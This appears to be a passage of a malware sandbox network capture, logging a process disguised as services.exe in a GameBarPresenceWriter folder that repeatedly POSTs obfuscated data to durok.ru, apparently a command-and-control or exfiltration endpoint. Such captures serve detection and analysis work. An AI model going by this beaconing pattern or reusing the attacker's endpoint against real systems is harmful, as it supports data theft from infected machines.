                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2BFm9JhXKMpeM1Uq8ZAF4GpThycEPwxmp%2FQakBw79q0%2Fzq6lenvYDwWa35Lyi5o8ZeyAeXT%2BDl%2FV3tTTGwvev86Wi0gYYR%2B2NjLpLnT7WiecIPTG2NRhSE8n%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82626e0e6641af-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3877&min_rtt=1637&rtt_var=5095&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2439&delivery_rate=74630&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5a 3d 39 30 0a 20 3c 2c 1e 3f 04 3a 1b 3d 21 26 07 2a 31 3a 00 28 2f 3e 10 2b 28 20 09 23 3a 26 5d 2a 39 27 05 32 0f 29 02 31 31 2e 5c 05 1d 27 16 28 15 23 03 33 32 21 59 3e 3d 31 18 28 2e 13 5b 27 06 2b 58 23 2b 0b 02 20 1f 3f 02 3b 2c 28 5e 2e 3c 24 10 3c 30 22 11 21 2d 21 51 0c 1f 38 56 21 17 09 1c 31 00 21 56 21 0e 19 54 32 01 26 10 21 28 3b 54 27 04 2b 5a 32 0a 3b 53 37 2d 27 52 2b 3d 3d 06 24 3f 29 5c 2b 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$Z=90 <,?:=!&*1:(/>+( #:&]*9'2)11.\'(#32!Y>=1(.['+X#+ ?;,(^.<$<0"!-!Q8V!1!V!T2&!(;T'+Z2;S7-'R+==$?)\+9%^-#T>TV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49795 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:01.687414885 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:02.059895039 CET | 2548 | OUT | Data Raw: 59 5d 5e 50 51 5e 59 52 5e 58 52 54 56 5e 58 5a 54 5d 5b 59 56 52 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^PQ^YR^XRTV^XZT][YVRSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$?0\<:="(^,X-V?'&$/] , ,:<8=5"Z.#Z*
Dec 26, 2024 17:18:02.868697882 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:03.144517899 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:02 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEHyWjBhNA3kIol%2FtAon01iqJb9tVLRxaudPr%2FrsntZvS9dmiOF2Rw3PO7XrAJ%2F1pKZ%2BTdsJcA5GAtsFcqychL%2BumMAeKhJaOv6WwG1Y7VMxsMDbpwUtmpBF3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82626ed8187c82-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8595&min_rtt=2017&rtt_var=13913&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=26717&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49801 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:03.393332958 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:03.739891052 CET | 2548 | OUT | Data Raw: 59 50 5e 50 51 5e 59 53 5e 58 52 54 56 51 58 5a 54 5c 5b 58 56 5e 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^PQ^YS^XRTVQXZT\[XV^S[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')2 (62;/>-U)Y$$7,P7/&Y-'+$^>5"Z.#Z*


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49802 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:04.157877922 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:04.505635023 CET | 2128 | OUT | Data Raw: 59 50 5e 5f 51 5e 59 52 5e 58 52 54 56 5d 58 51 54 52 5b 5f 56 52 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^_Q^YR^XRTV]XQTR[_VRS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<"/?:)T6/,Q*2_3< ?8U4<2_,:$C> <\="Z.#Z*6
Dec 26, 2024 17:18:05.597209930 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:05.853837967 CET | 949 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:05 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yraUTbNuv%2FEqYFpT5yfB%2BUrSUeJRNjllBECDek48iKrZ5e5Cn%2BRTUkjxemjU7AuB0Xizgp6%2FhqdkLg0BttoYLVVooNKzbdCq3IibolSgrZN4eXAZhP2bm2LmcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82627fbb2141df-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=11380&min_rtt=1871&rtt_var=19721&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=18729&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 02 2a 07 02 0f 34 3f 30 1e 2b 3e 3e 50 28 21 31 5e 2b 32 07 5e 3f 3c 25 0f 3f 01 2c 0b 23 2a 32 10 3e 3a 24 5c 32 08 3a 10 24 21 2e 5c 05 1d 27 5b 3c 38 3f 07 26 21 2d 1c 29 07 39 1a 29 3e 32 03 25 3f 0a 02 37 5d 2a 5f 20 21 3f 04 2c 02 2c 5e 2d 5a 30 5a 3c 30 29 03 21 2d 21 51 0c 1f 3b 0e 36 07 0d 59 25 2d 3e 0a 22 56 3b 51 25 06 2a 1f 22 05 05 54 24 14 3f 5c 27 23 2b 55 20 5b 33 1f 28 3d 00 5f 25 06 35 5d 3e 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'*4?0+>>P(!1^+2^?<%?,#*2>:$\2:$!.\'[<8?&!-)9)>2%?7]*_ !?,,^-Z0Z<0)!-!Q;6Y%->"V;Q%*"T$?\'#+U [3(=_%5]>9%^-#T>TV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49803 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:04.277775049 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:04.641232967 CET | 2548 | OUT | Data Raw: 5c 59 5e 58 51 5f 5c 52 5e 58 52 54 56 58 58 53 54 5d 5b 58 56 50 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y^XQ_\R^XRTVXXST][XVPSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')2 _>)5$[8>)>41$;[7<T ,:[.E+0<]+5"Z.#Z*"
Dec 26, 2024 17:18:05.828226089 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:06.082776070 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:05 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OZJ67ut8t%2F2KEWjMghFaeZiDJMWruNVdvWEr3gtuPvrMVDPhfyUwuL%2FEUZJ61DG%2Fo0co%2BDFqulbUHpYMqVwhD1mb0AKfTEGUjqsOP7%2BhzCjyPtDp1S2urrvUhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82628159b2c434-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=97398&min_rtt=52120&rtt_var=51887&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=28012&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49809 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:06.325381041 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:06.677433014 CET | 2548 | OUT | Data Raw: 59 51 5e 5f 54 55 5c 51 5e 58 52 54 56 5e 58 50 54 55 5b 59 56 54 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^_TU\Q^XRTV^XPTU[YVTS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+1<Z+9P5T$_/-)):[%$,4#&_,:8E(<]="Z.#Z*


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49810 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:06.985853910 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:07.333637953 CET | 2128 | OUT | Data Raw: 59 58 5b 5a 51 5b 59 56 5e 58 52 54 56 5b 58 53 54 5d 5b 5b 56 53 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[ZQ[YV^XRTV[XST][[VSS_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'?0?_56"/8=5T='=''']7 Q7!-)$C<3#>"Z.#Z*.
Dec 26, 2024 17:18:08.265398026 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:08.567361116 CET | 950 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:08 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aj%2B%2B922VGNu%2FvxLFgkIX4XYSsjcwExpTe%2BRvSr5myr3NDCiIILuCCA70Wnv3NTFNWnJIJwMbHGmAI3tru2eOPgUPucbk2nSZv2J2HiSX%2F9hMg5XsVtCk16JFNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262909dc872ab-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3460&min_rtt=1899&rtt_var=3835&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=101445&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 13 2a 00 24 0f 37 2f 27 0e 28 2d 3d 0f 3d 21 3e 07 2a 31 2e 07 28 11 22 57 28 01 28 09 37 04 00 11 3d 2a 28 58 31 0f 2d 03 26 31 2e 5c 05 1d 27 5a 3f 38 33 00 27 32 03 5a 2a 00 3a 08 29 2d 39 5f 30 01 30 00 23 38 3a 15 20 31 05 01 2c 5a 34 5f 2d 02 2b 03 3f 30 03 05 22 2d 21 51 0c 1f 38 1e 35 3a 3b 13 27 2e 2e 0b 35 0e 30 0d 31 06 00 1d 22 15 09 57 24 29 38 04 32 30 3b 54 23 03 3b 56 3f 04 21 00 25 3f 29 11 29 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$*$7/'(-==!>*1.("W((7=*(X1-&1.\'Z?83'2Z*:)-9_00#8: 1,Z4_-+?0"-!Q85:;'..501"W$)820;T#;V?!%?))9%^-#T>TV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49811 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:07.196902990 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:07.552474022 CET | 2548 | OUT | Data Raw: 5c 5e 5e 51 54 5d 59 5a 5e 58 52 54 56 5a 58 52 54 51 5b 55 56 53 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^QT]YZ^XRTVZXRTQ[UVSSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$("+>9:#" X;=*>4%'/\#/# ?194<8X)"Z.#Z**
Dec 26, 2024 17:18:08.583554029 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:08.850842953 CET | 796 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:08 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g7FKDck3SU0Zp1ZKC740szlXhTLQpQC%2BZngA1YYtpehCKt5Ru0miJjcsBJLLoRfc0pDjP7jzpb3c%2B0DsOuI1grdkYe41%2FQR1Whr6r7FVqkhHJODsZIL8OIQX9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82629269a8c436-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5389&min_rtt=1752&rtt_var=7931&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=47327&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49817 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:09.089729071 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:09.443401098 CET | 2548 | OUT | Data Raw: 59 59 5e 51 51 5c 59 52 5e 58 52 54 56 51 58 53 54 51 5b 5d 56 50 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY^QQ\YR^XRTVQXSTQ[]VPSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')1<*5T6";;%='.[$7$7 U <"Y.(+>"Z.#Z*
Dec 26, 2024 17:18:10.349991083 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:10.605757952 CET | 795 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:10 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y3twWTPBo4gX72YiZ7y5dyNzRaTZaFHBRp1h5EqQHGeoInIdvbpJWBdiRgsCCIPVLfsRECaZ9LoBk879hdG%2BWdy3Gv8MjyocPCdV3BrYz2Q8wdy4IiMaPR9DvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82629da8a018cc-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=51797&min_rtt=51395&rtt_var=20077&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26734&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49818 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:09.707442999 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:10.052357912 CET | 2128 | OUT | Data Raw: 59 59 5b 58 51 59 59 53 5e 58 52 54 56 5b 58 52 54 57 5b 58 56 57 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY[XQYYS^XRTV[XRTW[XVWSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+1>*%T!4;%)%''/[ ,+",.B<3*"Z.#Z*.
Dec 26, 2024 17:18:10.921268940 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:11.173861027 CET | 952 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:10 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJPNKt8uj353KuQCXf9FcA9BwShrA6XYjJo54W%2FJyF94IcH%2BW4Ie67M2ywUkevITZSlVvT3FIV1gr8PqaJQJsB8%2FglYez%2Fy%2Bpll8d2%2BmRpwWx701A67mzhXqXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262a13a4a4386-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3326&min_rtt=1721&rtt_var=3857&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=100219&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
